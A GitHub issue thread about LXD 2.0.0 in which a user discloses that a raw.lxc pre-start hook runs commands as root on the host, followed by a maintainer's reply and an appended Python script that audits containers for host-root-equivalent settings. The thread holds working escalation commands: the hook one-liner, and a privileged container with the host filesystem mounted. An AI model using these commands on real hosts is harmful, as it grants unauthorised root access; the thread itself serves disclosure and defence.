User can use lxc hooks for privilege escalation on lxd host #2003

simpoir opened this issue May 7, 2016 · 1 comment


@simpoir simpoir commented May 7, 2016

  • Distribution: Ubuntu 16.04
  • Kernel version: 4.4.0-21-generic
  • LXD version: 2.0.0
  • Storage backend in use: ZFS

LXD does not filter out or deny users setting the lxc pre-start hook in user containers, which could be used to execute code as root on the host, outside the containers. Other hooks either run as a subuid or in the contained environment, so I see no direct issue with them, but pre-start runs as a privileged user and could be used for privilege escalation.

```
joeuser@desktop:~$ lxc launch images:ubuntu/trusty/amd64 runme -c raw.lxc="lxc.hook.pre-start=sh -c 'echo foo >/runme'"
Creating runme
Starting runme
joeuser@laptop:~$ ls -l /runme 
-rw-r--r-- 1 root root 5 May  7 10:29 /runme
```

@stgraber stgraber commented May 7, 2016

I thought we had it blocked but apparently had to unblock it for some reason (nova-lxd maybe) and even have a test to make sure it does run...

We may end up blocking it again at some point down the line as we generally don't guarantee anything about raw.lxc.

That being said, I don't think it's a security issue as we consider anyone having access to the LXD API to have full root access anyway.

Basically the following is always possible and will give you similar access:

```
lxc init ubuntu:16.04 blah -c security.privileged=true
lxc config device add blah root disk source=/ path=/mnt/root recursive=true
```

At which point you have the whole host mounted in /mnt/root and you have root access against all of it.
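
The thread names three container settings that amount to root on the host: `raw.lxc` hooks, `security.privileged=true`, and disk devices sourced from a host path. An audit for those three follows, as an added example that is not part of the original thread or LXD's own code. It assumes input shaped like `lxc list --format json` (fields `name`, `expanded_config`, `expanded_devices`); the sample data is constructed.

```python
import json

# Constructed sample, shaped like `lxc list --format json` output (assumed
# fields: name, expanded_config, expanded_devices). Not real host data.
SAMPLE = json.dumps([
    {"name": "runme",
     "expanded_config": {"raw.lxc": "lxc.hook.pre-start=sh -c 'echo foo >/runme'"},
     "expanded_devices": {"root": {"type": "disk", "path": "/"}}},
    {"name": "blah",
     "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {"root": {"type": "disk", "source": "/",
                                   "path": "/mnt/root", "recursive": "true"}}},
    {"name": "web",
     "expanded_config": {},
     "expanded_devices": {"root": {"type": "disk", "path": "/"}}},
])

TRUE_VALUES = {"true", "1", "yes", "on"}  # assumed boolean spellings


def audit(containers):
    """Return (container, issue, detail) tuples for host-root-equivalent settings."""
    findings = []
    for c in containers:
        name = c.get("name", "?")
        # expanded_* includes settings inherited from profiles.
        config = c.get("expanded_config") or c.get("config") or {}
        devices = c.get("expanded_devices") or c.get("devices") or {}
        # raw.lxc is handed to liblxc as key=value lines.
        for line in config.get("raw.lxc", "").splitlines():
            key = line.split("=", 1)[0].strip()
            if key.startswith("lxc.hook."):
                findings.append((name, "raw.lxc hook", key))
        if config.get("security.privileged", "").lower() in TRUE_VALUES:
            findings.append((name, "privileged container", "security.privileged"))
        for dev_name in sorted(devices):
            dev = devices[dev_name]
            # A disk device whose source is an absolute path exposes host files.
            if dev.get("type") == "disk" and dev.get("source", "").startswith("/"):
                findings.append((name, "host path disk",
                                 f"{dev_name}: {dev['source']} -> {dev.get('path')}"))
    return findings


if __name__ == "__main__":
    for finding in audit(json.loads(SAMPLE)):
        print("%-6s %-22s %s" % finding)
```

On a live host, pass the parsed output of `lxc list --format json` to `audit()` in place of `SAMPLE`.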
